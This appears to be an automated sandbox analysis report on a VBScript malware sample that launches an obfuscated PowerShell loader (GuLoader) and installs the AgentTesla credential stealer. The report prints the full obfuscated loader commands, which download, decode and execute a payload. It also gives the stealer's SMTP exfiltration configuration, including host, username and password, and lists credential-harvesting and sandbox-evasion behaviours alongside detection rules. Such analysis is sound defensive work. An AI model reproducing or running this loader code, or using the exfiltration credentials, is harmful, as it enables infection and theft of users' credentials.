Windows Analysis Report
G4-TODOS.vbs

Overview

General Information

Sample name: G4-TODOS.vbs
Analysis ID: 1430754
MD5: 0894754b81c21bfa79481c3940d134d5
SHA1: 381352cd7b6551606bfb8c07cd77d7c50ffe41cc
SHA256: 0d456eedf9663741ffc712deadd8f8960e711b68de8b198ec1aec9dc4e3279d4
Tags: Formbook, vbs
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 1516 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4632 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. 
Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanthgshptse nfignResissop rd)Irrit ');Exuberate (Fritidsmuligheds 'Laane$D.sbrgFro.elOversoh.mogbStathaKnuselCenti:UpbuofOliedoHolderUnw re .pornArbu o,imstosupernHofjg= .add$.erceIBaktenwoodsfBortfeG,ptacTiptit LateiSkarloExtran Ab o. S.elsTomogpunquilMilitiEkstrtPotla(Hemih$,rnseN,arato Kn,pnFy decStilloSknh m.anpibCarpeu PharsUdfritFazelidobbeb nklilForhaeUngen1Foofa7.abbi3F.izz)Ectro ');$Infection=$forenoon[0];Exuberate (Fritidsmuligheds 'Anita$ metyg DrkilB endoSolenbAdapta Wom.l hung:SstjeM.dusti BrndkRip arNucleoFlagef askioUnyconCasheiNar.gs Vis kr.dia=.esteNPincheIndkawMeth.-Obse.OSvejsbCharkjPrecaeF,natc InvatEchin Die.SFordkyBioc.s Brost reageChickmConve.uncolNFagvieUnnartUjvn,.ColloW otawe bestb Fr,mCTekstlForbei S.ske SkalnE,tert H,rn ');Exuberate (Fritidsmuligheds 'Belli$KatteMBl,dei nsuskEditar NskeoSulkafScotto StoknSprini,vistsSul.okRecon. 
V ldHHer keCrassa StordLn roe,eclirRef rsLeuk [ Camp$OktobM UgeseEelbldBahadi urokcSelskoHotbrp .ogrsAimblyPrciscSpirah ,atto Co kl Monoo MalegHep ti ParacTransa TubelInsin],aneb=Uforu$Paul.FLuteol Tu coLeadikPeachkEstheeGalacdTid,peRecit ');$Besynderligeres=Fritidsmuligheds 'EncepM enstiCountkHalssrP,atio SvejfPolluo Mal.nIsoceisonlys ammekSarco.SociaDFnge.oCon twNonlin nsollUnn goBiu.ia Skjod Na sF eleciKa,asl .utieVirak(tardy$.ndiaIC,ryinPrsidf Eftee ,unacSociat CrimiBrddeo ongsnBefat, un e$ SparD Flora KlintKl.ddaPhospfPeriaoGunn rGutiemSteriaSar,btscotts mino)Nedhn ';$Besynderligeres=$Supplicate[1]+$Besynderligeres;$Dataformats=$Supplicate[0];Exuberate (Fritidsmuligheds 'Lavry$.ewingPaprilRetsvoBl wfbDr.esaHalvfl Bul,:GrahaCDogeah un ea.oders liqueE.antdUnder1 Gas.8 .upe0D,tai=Journ(StonyT OrddeSweetsVg est,bser-ProloPerythaEuropt .elihPo sy gril$UnsorDSal,aaDu,metFamilaFa,etfAmyl,oProphrLoamimArvebaApicut PantsEno.i).cety ');while (!$Chased180) {Exuberate (Fritidsmuligheds 'Faare$NoningOpe.olBesnroLegemb Fo,la OmkrlSolde: FravZProacyIndirm,anguobalail,osseoInscrgInteri KnipeFathmsAp.ci=Aceti$OutwatChri rWhir uNord.eDoser ') ;Exuberate $Besynderligeres;Exuberate (Fritidsmuligheds 'BisamS PhostR steaArchbrCo.totKnald-sttteSPlan lMul teSminkeLsgngpGrund Anhal4Pala. 
');Exuberate (Fritidsmuligheds 'Lgten$Squirg ,evil DataoAria bLa.tsa BakelKalkb:Ch.ckCBathth F,oraMisbisKaleieMi bedE,ter1 Afh 8Maksi0,anch=.ubpr(b,dwaTTri ue SystsFaks trekla-RaadiP Par aSh edtMorfih Mala Unpre$NeuraDFridaaoutqutKneppa.achifMelleoCoenar SeismCabbaaCon,itExampsCi at)Laese ') ;Exuberate (Fritidsmuligheds 'Bybli$ SorbgSladdl ovehoQuestbCoveraChi,ilHillo:NvnviE BryokC nsosMiljbpJed.oeT,lserRep,rtEup ogHektorTyphouTa.sepSten,pPhongeAceta=Typer$Or.ergIns,tl Disso rbeb menuaAudiolCrouk:C.ltuLIdepoyanacrdKoncishaandiLeanbd BalleI dusrDeinknSkudse.ircu+Elvrk+Phone%elevh$KreatfHj peoPamphrCausee ,olinVuggeoCoatdoFemtinDekup.WholecFemaloIndleuunsp,n invotFau.e ') ;$Infection=$forenoon[$Ekspertgruppe];}Exuberate (Fritidsmuligheds ' Pre,$Bladkg Jernl,nisookneelbKommeayuquilbu ka:BastaBLmmellFuroroMellekFilhaeTre,cr MisskMola l.dermrRetniiTrivin Phryg otoneSydamrTimmenPreemeUnmo,sRelat Kode =Ty,ef shruGChriseP.moltSilen-RegnbCFilstoIndusn Hea t.mertePer,inModert S,ri Naian$Pa,hrD UncoaPul.etA.orpa Fin fNoncioParchr Untim Ca,iaUdskrtA,skasMove. 
');Exuberate (Fritidsmuligheds 'Skrat$knowlg Livvl Af,ooLegi bElgenaFarvel gter:grundFTa.araMatthrForflrMaskaiAr ejeKartorsinatiLimp,e Fj.rs rila Frdig=Dyknd eleg[BureaS O eryTectos hacotBegiveHydrom.atak.OppiaCKloakosolsenKnopsvUndereV.difrUnw.atForly]B vua:S,aae:MisdeFKighorHalvkoFang.mSchavBSmalsa,umeasMensueMetal6Fos,i4MasseSPor,atNonser IdgaiStat,nVinbjg Tuml(We ld$,ogplBSv vll F lno TosdkT,tere CoefrTitankSsterlInfatr A,piiChalcn ,utsg IrraeTrikor AilenIntraeCentrsPersi)Spidv ');Exuberate (Fritidsmuligheds 'Ugeln$AntirgUnslelF,steoBrac,bheelmaLakfalProfe: PaucPUforahGonosiVa.gflTh usoCantamSy onyNonextC.eckhMa,kriFrk pcFrpe ,eind=K,gni Aarsr[MeasuSHaandyUnders V.rdtWat,reBowbam Lov..S,lndTsleuteC.utixUdda,t nben.KreolE Can n No,pcMistaoUn.rodHusbaiBefoonSemidgMordv] Nitr:Rr an:UnfraAPrat SEmigrCTekstIFdestIGrave.Muff,GRectieAbusetKoreoSQuie.tco,alr mejsi HulknBarkegFlatl(Preco$Laur F Aquea CresrAnstir gjeniKontoeGvererxeropi .rndeHermosSpre.)Loplu ');Exuberate (Fritidsmuligheds 'Machi$ unelg,eendlMorseoRegiobNeuroabutt.l Inca: CornKOb ucoFl,brnAwhirk outcuPolyprA ronrBesmoePointrPrehaeTranstIndsb=Beki $ BonkPSubinhOversiVirkslSubstoSolatmg oinyFladtttin.mh flaiTheoscSkamf.Afg ssVi.giuHyp,cbSl,tssTrke,tskrhara.basiKonsenMor,egU,ryd(Svmme2frise9 .ksm8Epica1Comel0 Vild5 Begr,Mab n2genne8Overm5 hilp0typis0Smalh) erne ');Exuberate $Konkurreret;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1468 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 2080 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. 
Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanthgshptse nfignResissop rd)Irrit ');Exuberate (Fritidsmuligheds 'Laane$D.sbrgFro.elOversoh.mogbStathaKnuselCenti:UpbuofOliedoHolderUnw re .pornArbu o,imstosupernHofjg= .add$.erceIBaktenwoodsfBortfeG,ptacTiptit LateiSkarloExtran Ab o. S.elsTomogpunquilMilitiEkstrtPotla(Hemih$,rnseN,arato Kn,pnFy decStilloSknh m.anpibCarpeu PharsUdfritFazelidobbeb nklilForhaeUngen1Foofa7.abbi3F.izz)Ectro ');$Infection=$forenoon[0];Exuberate (Fritidsmuligheds 'Anita$ metyg DrkilB endoSolenbAdapta Wom.l hung:SstjeM.dusti BrndkRip arNucleoFlagef askioUnyconCasheiNar.gs Vis kr.dia=.esteNPincheIndkawMeth.-Obse.OSvejsbCharkjPrecaeF,natc InvatEchin Die.SFordkyBioc.s Brost reageChickmConve.uncolNFagvieUnnartUjvn,.ColloW otawe bestb Fr,mCTekstlForbei S.ske SkalnE,tert H,rn ');Exuberate (Fritidsmuligheds 'Belli$KatteMBl,dei nsuskEditar NskeoSulkafScotto StoknSprini,vistsSul.okRecon. 
V ldHHer keCrassa StordLn roe,eclirRef rsLeuk [ Camp$OktobM UgeseEelbldBahadi urokcSelskoHotbrp .ogrsAimblyPrciscSpirah ,atto Co kl Monoo MalegHep ti ParacTransa TubelInsin],aneb=Uforu$Paul.FLuteol Tu coLeadikPeachkEstheeGalacdTid,peRecit ');$Besynderligeres=Fritidsmuligheds 'EncepM enstiCountkHalssrP,atio SvejfPolluo Mal.nIsoceisonlys ammekSarco.SociaDFnge.oCon twNonlin nsollUnn goBiu.ia Skjod Na sF eleciKa,asl .utieVirak(tardy$.ndiaIC,ryinPrsidf Eftee ,unacSociat CrimiBrddeo ongsnBefat, un e$ SparD Flora KlintKl.ddaPhospfPeriaoGunn rGutiemSteriaSar,btscotts mino)Nedhn ';$Besynderligeres=$Supplicate[1]+$Besynderligeres;$Dataformats=$Supplicate[0];Exuberate (Fritidsmuligheds 'Lavry$.ewingPaprilRetsvoBl wfbDr.esaHalvfl Bul,:GrahaCDogeah un ea.oders liqueE.antdUnder1 Gas.8 .upe0D,tai=Journ(StonyT OrddeSweetsVg est,bser-ProloPerythaEuropt .elihPo sy gril$UnsorDSal,aaDu,metFamilaFa,etfAmyl,oProphrLoamimArvebaApicut PantsEno.i).cety ');while (!$Chased180) {Exuberate (Fritidsmuligheds 'Faare$NoningOpe.olBesnroLegemb Fo,la OmkrlSolde: FravZProacyIndirm,anguobalail,osseoInscrgInteri KnipeFathmsAp.ci=Aceti$OutwatChri rWhir uNord.eDoser ') ;Exuberate $Besynderligeres;Exuberate (Fritidsmuligheds 'BisamS PhostR steaArchbrCo.totKnald-sttteSPlan lMul teSminkeLsgngpGrund Anhal4Pala. 
');Exuberate (Fritidsmuligheds 'Lgten$Squirg ,evil DataoAria bLa.tsa BakelKalkb:Ch.ckCBathth F,oraMisbisKaleieMi bedE,ter1 Afh 8Maksi0,anch=.ubpr(b,dwaTTri ue SystsFaks trekla-RaadiP Par aSh edtMorfih Mala Unpre$NeuraDFridaaoutqutKneppa.achifMelleoCoenar SeismCabbaaCon,itExampsCi at)Laese ') ;Exuberate (Fritidsmuligheds 'Bybli$ SorbgSladdl ovehoQuestbCoveraChi,ilHillo:NvnviE BryokC nsosMiljbpJed.oeT,lserRep,rtEup ogHektorTyphouTa.sepSten,pPhongeAceta=Typer$Or.ergIns,tl Disso rbeb menuaAudiolCrouk:C.ltuLIdepoyanacrdKoncishaandiLeanbd BalleI dusrDeinknSkudse.ircu+Elvrk+Phone%elevh$KreatfHj peoPamphrCausee ,olinVuggeoCoatdoFemtinDekup.WholecFemaloIndleuunsp,n invotFau.e ') ;$Infection=$forenoon[$Ekspertgruppe];}Exuberate (Fritidsmuligheds ' Pre,$Bladkg Jernl,nisookneelbKommeayuquilbu ka:BastaBLmmellFuroroMellekFilhaeTre,cr MisskMola l.dermrRetniiTrivin Phryg otoneSydamrTimmenPreemeUnmo,sRelat Kode =Ty,ef shruGChriseP.moltSilen-RegnbCFilstoIndusn Hea t.mertePer,inModert S,ri Naian$Pa,hrD UncoaPul.etA.orpa Fin fNoncioParchr Untim Ca,iaUdskrtA,skasMove. 
');Exuberate (Fritidsmuligheds 'Skrat$knowlg Livvl Af,ooLegi bElgenaFarvel gter:grundFTa.araMatthrForflrMaskaiAr ejeKartorsinatiLimp,e Fj.rs rila Frdig=Dyknd eleg[BureaS O eryTectos hacotBegiveHydrom.atak.OppiaCKloakosolsenKnopsvUndereV.difrUnw.atForly]B vua:S,aae:MisdeFKighorHalvkoFang.mSchavBSmalsa,umeasMensueMetal6Fos,i4MasseSPor,atNonser IdgaiStat,nVinbjg Tuml(We ld$,ogplBSv vll F lno TosdkT,tere CoefrTitankSsterlInfatr A,piiChalcn ,utsg IrraeTrikor AilenIntraeCentrsPersi)Spidv ');Exuberate (Fritidsmuligheds 'Ugeln$AntirgUnslelF,steoBrac,bheelmaLakfalProfe: PaucPUforahGonosiVa.gflTh usoCantamSy onyNonextC.eckhMa,kriFrk pcFrpe ,eind=K,gni Aarsr[MeasuSHaandyUnders V.rdtWat,reBowbam Lov..S,lndTsleuteC.utixUdda,t nben.KreolE Can n No,pcMistaoUn.rodHusbaiBefoonSemidgMordv] Nitr:Rr an:UnfraAPrat SEmigrCTekstIFdestIGrave.Muff,GRectieAbusetKoreoSQuie.tco,alr mejsi HulknBarkegFlatl(Preco$Laur F Aquea CresrAnstir gjeniKontoeGvererxeropi .rndeHermosSpre.)Loplu ');Exuberate (Fritidsmuligheds 'Machi$ unelg,eendlMorseoRegiobNeuroabutt.l Inca: CornKOb ucoFl,brnAwhirk outcuPolyprA ronrBesmoePointrPrehaeTranstIndsb=Beki $ BonkPSubinhOversiVirkslSubstoSolatmg oinyFladtttin.mh flaiTheoscSkamf.Afg ssVi.giuHyp,cbSl,tssTrke,tskrhara.basiKonsenMor,egU,ryd(Svmme2frise9 .ksm8Epica1Comel0 Vild5 Begr,Mab n2genne8Overm5 hilp0typis0Smalh) erne ');Exuberate $Konkurreret;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 3596 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 316 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • newfile.exe (PID: 3884 cmdline: "C:\Users\user\AppData\Roaming\newfile\newfile.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 3184 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • newfile.exe (PID: 824 cmdline: "C:\Users\user\AppData\Roaming\newfile\newfile.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "SMTP", "Host": "mail.cash4cars.nz", "Username": "logs@cash4cars.nz", "Password": "logs2024!"}
Source | Rule | Description | Author
00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000012.00000002.2590450166.00000000220F4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000D.00000002.1846945449.0000000009760000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
            Source | Rule | Description | Author
            amsi64_4632.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
            Strings:
            • 0x1023d:$b2: ::FromBase64String(
            • 0xd5c3:$s1: -join
            • 0x6d6f:$s4: +=
            • 0x6e31:$s4: +=
            • 0xb058:$s4: +=
            • 0xd175:$s4: +=
            • 0xd45f:$s4: +=
            • 0xd5a5:$s4: +=
            • 0xf7fb:$s4: +=
            • 0xf87b:$s4: +=
            • 0xf941:$s4: +=
            • 0xf9c1:$s4: +=
            • 0xfb97:$s4: +=
            • 0xfc1b:$s4: +=
            • 0xdce4:$e4: Get-WmiObject
            • 0xded3:$e4: Get-Process
            • 0xdf2b:$e4: Start-Process
            amsi32_2080.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
            Strings:
            • 0x101a4:$b2: ::FromBase64String(
            • 0xd5c3:$s1: -join
            • 0x6d6f:$s4: +=
            • 0x6e31:$s4: +=
            • 0xb058:$s4: +=
            • 0xd175:$s4: +=
            • 0xd45f:$s4: +=
            • 0xd5a5:$s4: +=
            • 0xf7fb:$s4: +=
            • 0xf87b:$s4: +=
            • 0xf941:$s4: +=
            • 0xf9c1:$s4: +=
            • 0xfb97:$s4: +=
            • 0xfc1b:$s4: +=
            • 0xdce4:$e4: Get-WmiObject
            • 0xded3:$e4: Get-Process
            • 0xdf2b:$e4: Start-Process
            • 0x17ad8:$e4: Get-Process

            System Summary

            Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs", ProcessId: 1516, ProcessName: wscript.exe
            Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\newfile\newfile.exe, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 316, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\newfile
            Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs", ProcessId: 1516, ProcessName: wscript.exe
